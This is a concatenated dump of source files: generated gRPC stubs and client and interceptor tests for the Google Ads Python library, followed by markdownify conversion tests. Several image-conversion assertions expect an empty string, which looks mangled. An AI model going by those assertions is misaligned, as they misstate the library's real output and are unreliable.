def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetMediaFile = channel.unary_unary(
'/google.ads.googleads.v2.services.MediaFileService/GetMediaFile',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.FromString,
)
self.MutateMediaFiles = channel.unary_unary(
'/google.ads.googleads.v2.services.MediaFileService/MutateMediaFiles',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.FromString,
)
class MediaFileServiceServicer(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def GetMediaFile(self, request, context):
"""Returns the requested media file in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateMediaFiles(self, request, context):
"""Creates media files. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MediaFileServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetMediaFile': grpc.unary_unary_rpc_method_handler(
servicer.GetMediaFile,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.SerializeToString,
),
'MutateMediaFiles': grpc.unary_unary_rpc_method_handler(
servicer.MutateMediaFiles,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.MediaFileService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/product_bidding_category_constant_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import product_bidding_category_constant_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2
from google.ads.google_ads.v2.proto.services import product_bidding_category_constant_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2
class ProductBiddingCategoryConstantServiceStub(object):
"""Proto file describing the Product Bidding Category constant service
Service to fetch Product Bidding Categories.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetProductBiddingCategoryConstant = channel.unary_unary(
'/google.ads.googleads.v2.services.ProductBiddingCategoryConstantService/GetProductBiddingCategoryConstant',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2.GetProductBiddingCategoryConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2.ProductBiddingCategoryConstant.FromString,
)
class ProductBiddingCategoryConstantServiceServicer(object):
"""Proto file describing the Product Bidding Category constant service
Service to fetch Product Bidding Categories.
"""
def GetProductBiddingCategoryConstant(self, request, context):
"""Returns the requested Product Bidding Category in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ProductBiddingCategoryConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetProductBiddingCategoryConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetProductBiddingCategoryConstant,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_product__bidding__category__constant__service__pb2.GetProductBiddingCategoryConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_product__bidding__category__constant__pb2.ProductBiddingCategoryConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.ProductBiddingCategoryConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/topic_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import topic_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2
from google.ads.google_ads.v2.proto.services import topic_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2
class TopicViewServiceStub(object):
"""Proto file describing the Topic View service.
Service to manage topic views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetTopicView = channel.unary_unary(
'/google.ads.googleads.v2.services.TopicViewService/GetTopicView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2.GetTopicViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2.TopicView.FromString,
)
class TopicViewServiceServicer(object):
"""Proto file describing the Topic View service.
Service to manage topic views.
"""
def GetTopicView(self, request, context):
"""Returns the requested topic view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TopicViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetTopicView': grpc.unary_unary_rpc_method_handler(
servicer.GetTopicView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_topic__view__service__pb2.GetTopicViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_topic__view__pb2.TopicView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.TopicViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/user_location_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import user_location_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2
from google.ads.google_ads.v2.proto.services import user_location_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2
class UserLocationViewServiceStub(object):
"""Proto file describing the UserLocationView service.
Service to manage user location views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetUserLocationView = channel.unary_unary(
'/google.ads.googleads.v2.services.UserLocationViewService/GetUserLocationView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2.GetUserLocationViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2.UserLocationView.FromString,
)
class UserLocationViewServiceServicer(object):
"""Proto file describing the UserLocationView service.
Service to manage user location views.
"""
def GetUserLocationView(self, request, context):
"""Returns the requested user location view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserLocationViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetUserLocationView': grpc.unary_unary_rpc_method_handler(
servicer.GetUserLocationView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_user__location__view__service__pb2.GetUserLocationViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_user__location__view__pb2.UserLocationView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.UserLocationViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: google-ads-python/tests/client_test.py
```python
import os
import mock
import yaml
from importlib import import_module
from pyfakefs.fake_filesystem_unittest import TestCase as FileTestCase
from google.ads.google_ads import client as Client
latest_version = Client._DEFAULT_VERSION
valid_versions = Client._VALID_API_VERSIONS
services_path = 'google.ads.google_ads.{}.proto.services'.format(latest_version)
services = import_module(services_path)
class GoogleAdsClientTest(FileTestCase):
"""Tests for the google.ads.googleads.client.GoogleAdsClient class."""
def _create_test_client(self, endpoint=None):
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
client = Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token, endpoint=endpoint)
return client
def setUp(self):
self.setUpPyfakefs()
self.developer_token = 'abc123'
self.client_id = 'client_id_123456789'
self.client_secret = 'client_secret_987654321'
self.refresh_token = '<PASSWORD>'
self.login_customer_id = '1234567890'
self.path_to_private_key_file = '/test/path/to/config.json'
self.delegated_account = '<EMAIL>'
def test_get_client_kwargs_login_customer_id(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': self.login_customer_id}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': self.login_customer_id,
'logging_config': None
})
def test_get_client_kwargs_login_customer_id_as_None(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': None}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': None,
'logging_config': None
})
def test_get_client_kwargs(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': None,
'login_customer_id': None,
'logging_config': None
})
def test_get_client_kwargs_custom_endpoint(self):
endpoint = 'alt.endpoint.com'
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'endpoint': endpoint}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
result = Client.GoogleAdsClient._get_client_kwargs(config)
self.assertEqual(
result,
{
'credentials': mock_credentials_instance,
'developer_token': self.developer_token,
'endpoint': endpoint,
'login_customer_id': None,
'logging_config': None
})
def test_load_from_dict(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_dict(config)
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('client_id'),
config.get('client_secret'),
config.get('refresh_token'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_login_cid_int(self):
login_cid = 1234567890
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token,
'login_customer_id': login_cid}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('client_id'),
config.get('client_secret'),
config.get('refresh_token'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=str(login_cid),
logging_config=None)
def test_load_from_storage_custom_path(self):
config = {
'developer_token': self.developer_token,
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token}
file_path = 'test/google-ads.yaml'
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials',
return_value=mock_credentials_instance):
Client.GoogleAdsClient.load_from_storage(path=file_path)
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_file_not_found(self):
wrong_file_path = 'test/wrong-google-ads.yaml'
self.assertRaises(
IOError,
Client.GoogleAdsClient.load_from_storage,
path=wrong_file_path)
def test_load_from_storage_required_config_missing(self):
config = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': self.refresh_token
}
file_path = 'test/google-ads.yaml'
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
self.assertRaises(
ValueError,
Client.GoogleAdsClient.load_from_storage,
path=file_path)
def test_load_from_storage_service_account_config(self):
config = {
'developer_token': self.developer_token,
'path_to_private_key_file': self.path_to_private_key_file,
'delegated_account': self.delegated_account
}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None
) as mock_client_init, mock.patch.object(
Client.oauth2,
'get_service_account_credentials',
return_value=mock_credentials_instance
) as mock_credentials:
Client.GoogleAdsClient.load_from_storage()
mock_credentials.assert_called_once_with(
config.get('path_to_private_key_file'),
config.get('delegated_account'))
mock_client_init.assert_called_once_with(
credentials=mock_credentials_instance,
developer_token=self.developer_token,
endpoint=None,
login_customer_id=None,
logging_config=None)
def test_load_from_storage_service_account_no_delegated_account(self):
config = {
'developer_token': self.developer_token,
'path_to_private_key_file': self.path_to_private_key_file}
file_path = os.path.join(os.path.expanduser('~'), 'google-ads.yaml')
self.fs.create_file(file_path, contents=yaml.safe_dump(config))
mock_credentials_instance = mock.Mock()
with mock.patch.object(
Client.GoogleAdsClient,
'__init__',
return_value=None), mock.patch.object(
Client.oauth2,
'get_service_account_credentials',
return_value=mock_credentials_instance):
self.assertRaises(
ValueError,
Client.GoogleAdsClient.load_from_storage)
def test_get_service(self):
# Retrieve service names for all defined service clients.
for ver in valid_versions:
services_path = 'google.ads.google_ads.%s' % ver
service_names = [
'%s%s' % (name.rsplit('ServiceClient')[0], 'Service')
for name in dir(import_module(services_path))
if 'ServiceClient' in name]
client = self._create_test_client()
# Iterate through retrieval of all service clients by name.
for service_name in service_names:
client.get_service(service_name)
def test_get_service_custom_endpoint(self):
service_name = 'GoogleAdsService'
service_module_base = 'google_ads_service'
grpc_transport_class_name = '%sGrpcTransport' % service_name
grpc_transport_module_name = '%s_grpc_transport' % service_module_base
transport_create_channel_path = (
'google.ads.google_ads.%s.services.transports.%s.%s.create_channel'
% (Client._DEFAULT_VERSION,
grpc_transport_module_name,
grpc_transport_class_name))
endpoint = 'alt.endpoint.com'
client = self._create_test_client(endpoint=endpoint)
# The GRPC transport's create_channel method is what allows the
# GoogleAdsClient to specify a custom endpoint. Here we mock the
# create_channel method in order to verify that it was given the
# endpoint specified by the client.
with mock.patch(transport_create_channel_path) as mock_create_channel:
# A new channel is created during initialization of the service
# client.
client.get_service(service_name)
mock_create_channel.assert_called_once_with(
address=endpoint, credentials=client.credentials,
options=Client._GRPC_CHANNEL_OPTIONS)
def test_get_service_not_found(self):
client = self._create_test_client()
self.assertRaises(ValueError, client.get_service, 'BadService')
def test_get_service_invalid_version(self):
client = self._create_test_client()
self.assertRaises(ValueError, client.get_service, 'GoogleAdsService',
version='bad_version')
def test_get_service_with_version(self):
client = self._create_test_client()
try:
client.get_service('GoogleAdsService', version=latest_version)
except Exception:
self.fail('get_service with a valid version raised an error')
# XXX: deferred test for fixing lazy loading
# def test_get_service_with_interceptor(self):
# client = self._create_test_client()
#
# class Interceptor:
# pass
#
# interceptor = Interceptor()
#
# with mock.patch.object(
# Client,
# 'intercept_channel'
# ) as mock_intercept_channel:
# client.get_service('GoogleAdsService', interceptors=[interceptor])
# first_interceptor = mock_intercept_channel.call_args[0][1]
# self.assertEqual(first_interceptor, interceptor)
#
def test_get_type(self):
for ver in valid_versions:
# Retrieve names for all types defined in pb2 files.
type_path = f'google.ads.google_ads.{ver}.types'
type_names = import_module(type_path).__all__
# Iterate through retrieval of all types by name.
for name in type_names:
if name.lower().endswith('pb2'):
continue
Client.GoogleAdsClient.get_type(
name, version=ver)
def test_get_type_not_found(self):
self.assertRaises(
ValueError, Client.GoogleAdsClient.get_type,
'BadType')
def test_get_type_invalid_version(self):
self.assertRaises(
ValueError, Client.GoogleAdsClient.get_type,
'GoogleAdsFailure', version='bad_version')
def test_init_no_logging_config(self):
"""Should only call logging.config.dictConfig if logging config exists.
"""
with mock.patch(
'logging.config.dictConfig'
) as mock_dictConfig, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token)
mock_dictConfig.assert_not_called()
def test_init_with_logging_config(self):
"""Configured LoggingInterceptor should call logging.dictConfig.
"""
config = {'test': True}
with mock.patch(
'logging.config.dictConfig'
) as mock_dictConfig, mock.patch.object(
Client.oauth2,
'get_installed_app_credentials'
) as mock_credentials:
mock_credentials_instance = mock_credentials.return_value
mock_credentials_instance.refresh_token = self.refresh_token
mock_credentials_instance.client_id = self.client_id
mock_credentials_instance.client_secret = self.client_secret
Client.GoogleAdsClient(mock_credentials_instance,
self.developer_token, logging_config=config)
mock_dictConfig.assert_called_once_with(config)
```
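For orientation, here is a hedged sketch of the call path these tests exercise: building a client from an in-memory config via `load_from_dict` and fetching a service client. All credential values are placeholders taken from the test fixtures above, not real tokens.
```python
from google.ads.google_ads.client import GoogleAdsClient

# Placeholder credentials mirroring the fixtures used in the tests above.
config = {
    'developer_token': 'abc123',
    'client_id': 'client_id_123456789',
    'client_secret': 'client_secret_987654321',
    'refresh_token': 'refresh-token-placeholder',
    'login_customer_id': '1234567890',
}
client = GoogleAdsClient.load_from_dict(config)
googleads_service = client.get_service('GoogleAdsService', version='v2')
```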
#### File: tests/interceptors/interceptor_mixin.py
```python
from unittest import TestCase
from google.ads.google_ads.interceptors.interceptor_mixin import \
InterceptorMixin
class InterceptorMixinTest(TestCase):
def test_get_request_id_from_metadata(self):
"""Ensures request-id is retrieved from metadata tuple."""
mock_metadata = (('request-id', '123456'),)
result = InterceptorMixin.get_request_id_from_metadata(mock_metadata)
self.assertEqual(result, '123456')
def test_get_request_id_no_id(self):
"""Ensures None is returned if metadata does't contain a request ID."""
mock_metadata = (('another-key', 'another-val'),)
result = (InterceptorMixin.get_request_id_from_metadata(mock_metadata))
self.assertEqual(result, None)
def test_parse_metadata_to_json(self):
mock_metadata = [
('x-goog-api-client',
'gl-python/123 grpc/123 gax/123'),
('developer-token', '<PASSWORD>'),
('login-customer-id', '9<PASSWORD>')]
result = InterceptorMixin.parse_metadata_to_json(mock_metadata)
self.assertEqual(result, '{\n'
' "developer-token": "<PASSWORD>",\n'
' "login-customer-id": "9999999999",\n'
' "x-goog-api-client": "gl-python/123 '
'grpc/123 gax/123"\n'
'}')
def test_parse_metadata_to_json_with_none(self):
mock_metadata = None
result = InterceptorMixin.parse_metadata_to_json(mock_metadata)
self.assertEqual(result, '{}')
``` |
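A small usage sketch of the two helpers under test, mirroring the metadata tuples used above:
```python
from google.ads.google_ads.interceptors.interceptor_mixin import InterceptorMixin

metadata = (('request-id', '123456'), ('another-key', 'another-val'))
request_id = InterceptorMixin.get_request_id_from_metadata(metadata)  # -> '123456'
as_json = InterceptorMixin.parse_metadata_to_json(metadata)           # -> pretty-printed JSON string
```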
{
"source": "jiulongw/python-markdownify",
"score": 3
} |
#### File: python-markdownify/tests/test_conversions.py
```python
from markdownify import markdownify as md, ATX, ATX_CLOSED, BACKSLASH, UNDERSCORE
import re
nested_uls = """
<ul>
<li>1
<ul>
<li>a
<ul>
<li>I</li>
<li>II</li>
<li>III</li>
</ul>
</li>
<li>b</li>
<li>c</li>
</ul>
</li>
<li>2</li>
<li>3</li>
</ul>"""
nested_ols = """
<ol>
<li>1
<ol>
<li>a
<ol>
<li>I</li>
<li>II</li>
<li>III</li>
</ol>
</li>
<li>b</li>
<li>c</li>
</ol>
</li>
<li>2</li>
<li>3</li>
</ul>"""
table = re.sub(r'\s+', '', """
<table>
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</table>
""")
table_head_body = re.sub(r'\s+', '', """
<table>
<thead>
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
</thead>
<tbody>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</tbody>
</table>
""")
table_missing_text = re.sub(r'\s+', '', """
<table>
<thead>
<tr>
<th></th>
<th>Lastname</th>
<th>Age</th>
</tr>
</thead>
<tbody>
<tr>
<td>Jill</td>
<td></td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</tbody>
</table>
""")
def test_chomp():
assert md(' <b></b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b>s </b> ') == ' **s** '
assert md(' <b> s</b> ') == ' **s** '
assert md(' <b> s </b> ') == ' **s** '
assert md(' <b> s </b> ') == ' **s** '
def test_a():
assert md('<a href="https://google.com">Google</a>') == '[Google](https://google.com)'
assert md('<a href="https://google.com">https://google.com</a>', autolinks=False) == '[https://google.com](https://google.com)'
assert md('<a href="https://google.com">https://google.com</a>') == '<https://google.com>'
assert md('<a href="https://community.kde.org/Get_Involved">https://community.kde.org/Get_Involved</a>') == '<https://community.kde.org/Get_Involved>'
assert md('<a href="https://community.kde.org/Get_Involved">https://community.kde.org/Get_Involved</a>', autolinks=False) == '[https://community.kde.org/Get\\_Involved](https://community.kde.org/Get_Involved)'
def test_a_spaces():
assert md('foo <a href="http://google.com">Google</a> bar') == 'foo [Google](http://google.com) bar'
assert md('foo<a href="http://google.com"> Google</a> bar') == 'foo [Google](http://google.com) bar'
assert md('foo <a href="http://google.com">Google </a>bar') == 'foo [Google](http://google.com) bar'
assert md('foo <a href="http://google.com"></a> bar') == 'foo bar'
def test_a_with_title():
text = md('<a href="http://google.com" title="The "Goog"">Google</a>')
assert text == r'[Google](http://google.com "The \"Goog\"")'
def test_a_shortcut():
text = md('<a href="http://google.com">http://google.com</a>')
assert text == '<http://google.com>'
def test_a_no_autolinks():
text = md('<a href="http://google.com">http://google.com</a>', autolinks=False)
assert text == '[http://google.com](http://google.com)'
def test_b():
assert md('<b>Hello</b>') == '**Hello**'
def test_b_spaces():
assert md('foo <b>Hello</b> bar') == 'foo **Hello** bar'
assert md('foo<b> Hello</b> bar') == 'foo **Hello** bar'
assert md('foo <b>Hello </b>bar') == 'foo **Hello** bar'
assert md('foo <b></b> bar') == 'foo bar'
def test_blockquote():
assert md('<blockquote>Hello</blockquote>') == '\n> Hello\n\n'
def test_blockquote_with_paragraph():
assert md('<blockquote>Hello</blockquote><p>handsome</p>') == '\n> Hello\n\nhandsome\n\n'
def test_nested_blockquote():
text = md('<blockquote>And she was like <blockquote>Hello</blockquote></blockquote>')
assert text == '\n> And she was like \n> > Hello\n> \n> \n\n'
def test_br():
assert md('a<br />b<br />c') == 'a \nb \nc'
def test_em():
assert md('<em>Hello</em>') == '*Hello*'
def test_em_spaces():
assert md('foo <em>Hello</em> bar') == 'foo *Hello* bar'
assert md('foo<em> Hello</em> bar') == 'foo *Hello* bar'
assert md('foo <em>Hello </em>bar') == 'foo *Hello* bar'
assert md('foo <em></em> bar') == 'foo bar'
def test_h1():
assert md('<h1>Hello</h1>') == 'Hello\n=====\n\n'
def test_h2():
assert md('<h2>Hello</h2>') == 'Hello\n-----\n\n'
def test_hn():
assert md('<h3>Hello</h3>') == '### Hello\n\n'
assert md('<h6>Hello</h6>') == '###### Hello\n\n'
def test_hn_chained():
assert md('<h1>First</h1>\n<h2>Second</h2>\n<h3>Third</h3>', heading_style=ATX) == '# First\n\n\n## Second\n\n\n### Third\n\n'
assert md('X<h1>First</h1>', heading_style=ATX) == 'X# First\n\n'
def test_hn_nested_tag_heading_style():
assert md('<h1>A <p>P</p> C </h1>', heading_style=ATX_CLOSED) == '# A P C #\n\n'
assert md('<h1>A <p>P</p> C </h1>', heading_style=ATX) == '# A P C\n\n'
def test_hn_nested_simple_tag():
tag_to_markdown = [
("strong", "**strong**"),
("b", "**b**"),
("em", "*em*"),
("i", "*i*"),
("p", "p"),
("a", "a"),
("div", "div"),
("blockquote", "blockquote"),
]
for tag, markdown in tag_to_markdown:
assert md('<h3>A <' + tag + '>' + tag + '</' + tag + '> B</h3>') == '### A ' + markdown + ' B\n\n'
assert md('<h3>A <br>B</h3>', heading_style=ATX) == '### A B\n\n'
# Nested lists not supported
# assert md('<h3>A <ul><li>li1</i><li>l2</li></ul></h3>', heading_style=ATX) == '### A li1 li2 B\n\n'
def test_hn_nested_img():
assert md('<img src="/path/to/img.jpg" alt="Alt text" title="Optional title" />') == ''
assert md('<img src="/path/to/img.jpg" alt="Alt text" />') == ''
image_attributes_to_markdown = [
("", ""),
("alt='Alt Text'", "Alt Text"),
("alt='Alt Text' title='Optional title'", "Alt Text"),
]
for image_attributes, markdown in image_attributes_to_markdown:
assert md('<h3>A <img src="/path/to/img.jpg " ' + image_attributes + '/> B</h3>') == '### A ' + markdown + ' B\n\n'
def test_hr():
assert md('Hello<hr>World') == 'Hello\n\n---\n\nWorld'
assert md('Hello<hr />World') == 'Hello\n\n---\n\nWorld'
assert md('<p>Hello</p>\n<hr>\n<p>World</p>') == 'Hello\n\n\n\n\n---\n\n\nWorld\n\n'
def test_head():
assert md('<head>head</head>') == 'head'
def test_atx_headings():
assert md('<h1>Hello</h1>', heading_style=ATX) == '# Hello\n\n'
assert md('<h2>Hello</h2>', heading_style=ATX) == '## Hello\n\n'
def test_atx_closed_headings():
assert md('<h1>Hello</h1>', heading_style=ATX_CLOSED) == '# Hello #\n\n'
assert md('<h2>Hello</h2>', heading_style=ATX_CLOSED) == '## Hello ##\n\n'
def test_i():
assert md('<i>Hello</i>') == '*Hello*'
def test_ol():
assert md('<ol><li>a</li><li>b</li></ol>') == '1. a\n2. b\n'
assert md('<ol start="3"><li>a</li><li>b</li></ol>') == '3. a\n4. b\n'
def test_p():
assert md('<p>hello</p>') == 'hello\n\n'
def test_strong():
assert md('<strong>Hello</strong>') == '**Hello**'
def test_ul():
assert md('<ul><li>a</li><li>b</li></ul>') == '* a\n* b\n'
def test_nested_ols():
assert md(nested_ols) == '\n1. 1\n\t1. a\n\t\t1. I\n\t\t2. II\n\t\t3. III\n\t2. b\n\t3. c\n2. 2\n3. 3\n'
def test_inline_ul():
assert md('<p>foo</p><ul><li>a</li><li>b</li></ul><p>bar</p>') == 'foo\n\n* a\n* b\n\nbar\n\n'
def test_nested_uls():
"""
Nested ULs should alternate bullet characters.
"""
assert md(nested_uls) == '\n* 1\n\t+ a\n\t\t- I\n\t\t- II\n\t\t- III\n\t+ b\n\t+ c\n* 2\n* 3\n'
def test_bullets():
assert md(nested_uls, bullets='-') == '\n- 1\n\t- a\n\t\t- I\n\t\t- II\n\t\t- III\n\t- b\n\t- c\n- 2\n- 3\n'
def test_li_text():
assert md('<ul><li>foo <a href="#">bar</a></li><li>foo bar </li><li>foo <b>bar</b> <i>space</i>.</ul>') == '* foo [bar](#)\n* foo bar\n* foo **bar** *space*.\n'
def test_img():
assert md('<img src="/path/to/img.jpg" alt="Alt text" title="Optional title" />') == ''
